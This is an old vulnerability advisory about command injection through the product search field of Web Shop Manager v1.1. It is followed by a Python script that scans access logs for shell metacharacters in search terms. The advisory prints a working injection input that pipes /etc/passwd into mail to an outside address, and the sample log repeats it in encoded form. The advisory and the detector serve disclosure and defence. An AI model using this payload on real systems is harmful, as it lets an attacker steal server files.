Web Shop Manager remote command execution
6th Aug 2002 [SBWID-5603]
COMMAND

	Web Shop Manager remote command execution

SYSTEMS AFFECTED

	Web Shop Manager v1.1

PROBLEM

	Tacettin Karadeniz [tacettinkaradeniz@yahoo.com] found:

	The Web Shop Manager allows you to manage a fully functional online
	store from a centralized web-based administration system.
	

	Exploit:
	

	It is possible to send the server's password file to any mail address
	by writing a command in the product search part of php-webshop-manager.
	The command that is written into the search part:
	

	 |mail CiLeK@xxxkaradenizeregli.net < /etc/passwd

	

	With this command, the password file is sent to the mail address.

SOLUTION

	Check [http://www.webscriptworld.com], no update yet.
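
	With no update available, one way to spot this input in web server
	access logs is sketched below. This is an added example, not code from
	the advisory or the vendor; the parameter names, the /shop/search.php
	path and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: the search term travels in a GET parameter. The advisory does
# not name it, so these parameter names are hypothetical.
SEARCH_PARAMS = {"search", "q", "keyword"}

# Shell metacharacters that have no place in a product search term.
# The advisory's input starts with "|" and uses "<" for redirection.
SHELL_META = re.compile(r"[|<>;`]|\$\(")

# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses, path and values are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2002:10:01:11 +0000] "GET /shop/search.php?search=blue+shirt HTTP/1.0" 200 5120',
    '192.0.2.44 - - [06/Aug/2002:10:02:37 +0000] "GET /shop/search.php?search=%7Cmail+user%40example.invalid+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 312',
    '192.0.2.44 - - [06/Aug/2002:10:02:59 +0000] "GET /shop/search.php?search=%257Cecho+test HTTP/1.0" 200 298',
]


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so that %257C is seen as '|'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_search_terms(log_lines):
    """Return (line_number, parameter, decoded_value) for flagged requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a recognisable request line
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            term = decode_fully(value)  # parse_qsl already decoded once
            if name.lower() in SEARCH_PARAMS and SHELL_META.search(term):
                hits.append((number, name, term))
    return hits
```

	The same character test can be applied server-side to reject a search
	term before it is processed. Searches submitted by POST do not appear
	in the access log and need to be checked in the application itself.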
